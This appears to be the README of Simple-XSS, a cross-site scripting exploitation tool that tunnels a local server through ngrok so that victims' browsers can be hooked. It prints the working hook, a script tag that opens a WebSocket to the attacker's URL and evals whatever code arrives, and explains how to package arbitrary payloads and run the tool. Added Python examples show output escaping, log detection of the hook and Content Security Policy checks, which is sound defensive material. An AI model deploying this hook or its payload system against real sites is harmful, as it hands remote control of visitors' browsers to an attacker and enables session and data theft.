Simple-XSS is a multi-platform cross-site scripting (XSS) vulnerability exploitation tool for pentesting. This application helps you create a hook that can easily and reliably catch a client by downloading a payload to their browser and executing it. You don't even need a public IP address for this, because the application takes care of tunneling the connection between you and the victim.
Disclaimer: This program is provided for educational and research purposes only. The creator of this program does not condone or support any illegal or malicious activity, and will not be held responsible for any such actions taken by others who may use this program. By downloading or using this program, you acknowledge that you are solely responsible for any consequences that may result from the use of this program.
Firstly, choose the hook. The default hook is the simplest one; it is only suitable for forms without XSS protection:
Then, choose the payload. The "Hello world" payload is an example payload that just alerts "Hello, World!":
Now, let's set up tunneling. Tunneling is needed to make the local server publicly reachable. You have two options:
- use one of the supported tunneling apps (currently only ngrok)
- tunnel the port yourself and pass the public URL of the HTTP tunnel to the program
Finally, you can run the process!
Now you can copy the hook and start hunting ;D
To demonstrate the possibilities, we can use the site xss-game.appspot.com. Enter the hook into the search form:
Press "Search". As you can see, we have the alert dialog!
Also, we have "Hello, World!" in our console:
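The demonstration above only works because the search form reflects the query into the page unchanged. As an added example (not code from Simple-XSS), the following Python shows the same search page rendered with and without output encoding, and a small detector that flags hook-shaped values in web-server access logs. The renderers, the sample hook (with a placeholder tunnel URL) and the log lines are all constructed here for illustration.

```python
"""Added example, not part of Simple-XSS: why the default hook only works on
forms without XSS protection, and how the hook shape can be spotted in logs.
The two renderers, the sample hook (with a placeholder tunnel URL) and the
access-log lines are all constructed here for illustration."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the shape of the default hook with a placeholder URL.
SAMPLE_HOOK = ("<script>c = new WebSocket('wss://tunnel.example/');"
               "c.onmessage = (e) => eval(e.data);</script>")


def render_unsafe(query: str) -> str:
    """Vulnerable search page: reflects the raw query into the HTML."""
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """Hardened search page: HTML-encodes the query before it enters markup."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """True if the rendered page still contains a parseable <script> tag."""
    return SCRIPT_TAG.search(page) is not None


# Constructed access-log lines in combined log format; the first carries a
# URL-encoded hook in the q= parameter, the second is an ordinary search.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /search?q=%3Cscript%3E'
    'c%3Dnew%20WebSocket%28%27wss%3A%2F%2Ftunnel.example%27%29%3B'
    'c.onmessage%3D%28e%29%3D%3Eeval%28e.data%29%3B%3C%2Fscript%3E HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:12:00:01 +0000] "GET /search?q=cats HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# All three markers together are the signature of a "fetch code over a
# WebSocket and eval it" hook; each alone is too common to alert on.
HOOK_MARKERS = ("<script", "websocket", "eval(")


def looks_like_remote_eval_hook(value: str) -> bool:
    """Heuristic: the decoded parameter value contains every hook marker."""
    lowered = value.lower()
    return all(marker in lowered for marker in HOOK_MARKERS)


def flag_hook_requests(log_lines):
    """Return (client_ip, parameter, decoded_value) for suspicious requests."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(match.group("target")).query
        for name, values in parse_qs(query).items():  # parse_qs URL-decodes
            for value in values:
                if looks_like_remote_eval_hook(value):
                    hits.append((client_ip, name, value))
    return hits


if __name__ == "__main__":
    print("unsafe page executes script:", contains_live_script(render_unsafe(SAMPLE_HOOK)))
    print("safe page executes script:  ", contains_live_script(render_safe(SAMPLE_HOOK)))
    for hit in flag_hook_requests(SAMPLE_LOG):
        print("suspicious request:", hit)
```

The detector is a heuristic over decoded query parameters, so it will miss hooks split across parameters or delivered in a POST body; its point is to show that the default hook has a recognisable shape, not to replace a WAF.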
Hooks folder: hooks
A hook is an HTML snippet designed to be embedded in a vulnerable XSS form. It looks like:

```html
<script>c = new WebSocket('{{environment.public_url}}');c.onmessage = (e) => eval(e.data);</script>
```

NOTE: {{environment.public_url}} is a built-in variable. You can read more about built-in objects below.

This is the default hook. When it is embedded in the vulnerable form, it downloads the JS code (the payload) from the server over the WebSocket protocol and executes it with eval.
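The default hook needs three things from the page it lands on: permission to run an inline script, permission to open a WebSocket to the tunnel URL, and permission to call eval. A Content Security Policy can deny each of these independently. The following is an added Python example (not Simple-XSS code) that parses a CSP header and reports which of the three steps it blocks; the policy strings, the placeholder tunnel URL wss://tunnel.example/ and the page origin https://app.example are all constructed for illustration, and the source matching is a simplified version of the CSP rules.

```python
"""Added example, not part of Simple-XSS: which Content Security Policy
settings stop each step of the default hook (inline script, WebSocket
connection, eval). Policies and URLs below are constructed for illustration."""
from urllib.parse import urlsplit


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source, ...]}. Everything is
    lower-cased; fine here because only keywords and hosts are compared."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.lower().split()
        if tokens:
            policy[tokens[0]] = tokens[1:]
    return policy


def effective(policy: dict, directive: str):
    """Sources governing a directive, falling back to default-src.
    None means the page places no restriction at all."""
    return policy.get(directive, policy.get("default-src"))


def source_allows(source: str, url: str, page_origin: str) -> bool:
    """Does one connect-src source expression permit a connection to url?
    Simplified matching: '*', 'self', scheme sources, and host sources with an
    optional '*.' wildcard; an https:// source also matches wss:// as the spec allows."""
    target = urlsplit(url)
    if source == "*":
        return True
    if source == "'self'":
        return f"{target.scheme}://{target.netloc}" == page_origin
    if source.startswith("'"):
        return False  # 'none', nonces and hashes never match a URL
    if source.endswith(":"):
        return target.scheme == source[:-1]
    scheme, host = source.split("://", 1) if "://" in source else ("", source)
    if scheme and scheme != target.scheme and (scheme, target.scheme) != ("https", "wss"):
        return False
    host = host.split("/", 1)[0].split(":", 1)[0]  # drop path and port
    target_host = target.hostname or ""
    if host.startswith("*."):
        return target_host.endswith(host[1:])
    return target_host == host


def hook_steps_blocked(csp_header: str, hook_ws_url: str,
                       page_origin: str = "https://app.example") -> dict:
    """For each step the default hook relies on, True if the policy blocks it."""
    policy = parse_csp(csp_header)
    script = effective(policy, "script-src")
    connect = effective(policy, "connect-src")
    # A nonce or hash in script-src makes browsers ignore 'unsafe-inline',
    # and the injected <script> carries no nonce.
    nonce_or_hash = script is not None and any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in script)
    return {
        "inline_script": script is not None and ("'unsafe-inline'" not in script or nonce_or_hash),
        "eval": script is not None and "'unsafe-eval'" not in script,
        "websocket": connect is not None
                     and not any(source_allows(s, hook_ws_url, page_origin) for s in connect),
    }


if __name__ == "__main__":
    hook_url = "wss://tunnel.example/"  # placeholder for the tool's tunnel address
    for header in ("",
                   "default-src 'self'; script-src 'self'",
                   "script-src 'unsafe-inline' 'unsafe-eval'; connect-src *"):
        print(repr(header), "->", hook_steps_blocked(header, hook_url))
```

A policy of `default-src 'self'` already breaks all three steps, which is why the README describes the default hook as suitable only for forms without XSS protection. The checker does not cover every CSP rule (for example, port wildcards or `strict-dynamic`), so treat a False as "not blocked by this simplified check" rather than a guarantee.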
A hook has the following structure:

```text
hook_folder
|
+-- hook.html
|
+-- package.toml
```

hook.html - main file; contains the HTML code that can be embedded in a vulnerable form.
package.toml - metadata file; contains data about the hook such as name, description, author and version.
Payloads folder: payloads
A payload is arbitrary JS code that is loaded by the hook on a vulnerable page and executed with eval.
A payload has the following structure:

```text
payload_folder
|
+-- payload.js
|
+-- package.toml
|
+-- init.py
```

payload.js - main file; contains arbitrary JS code.
package.toml - metadata file; contains data about the payload such as name, description, author and version.
init.py - Python file, imported when the payload is loaded. Lets you interact with the client side of the payload (payload.js) over the WebSocket protocol.
Built-in objects are objects passed into the hook and payload main files by the Jinja templating engine. They carry additional information that may be needed when loading a hook or payload.

- environment
  - public_url - public address of the WebSocket server
- package - the hook or payload
  - name - name of the package
  - author - package author
  - version - version of the package
  - description - package description

If you need to use a variable, write it as {{object.variable}}. For example:

```javascript
alert('{{metadata.name}} - V{{metadata.version}}')
```

This payload snippet displays an alert dialog showing the name and version of the payload.
Thanks to the Python Flet framework, the application works equally well in the browser and as a desktop graphical interface.
On Windows, first clone the repository:

```shell
git clone https://github.com/CrazyProger1/Simple-XSS
```

Then go to the folder and install the requirements:

```shell
cd Simple-XSS
pip install -r windows_requirements.txt
```

And finally run it:

```shell
python main.py
```
On Linux, first clone the repository:

```shell
git clone https://github.com/CrazyProger1/Simple-XSS
```

Then go to the folder and install the requirements:

```shell
cd Simple-XSS
pip install -r linux_requirements.txt
```

And finally run it:

```shell
python main.py
```
Simple-XSS is released under the MIT License. See the bundled LICENSE file for details.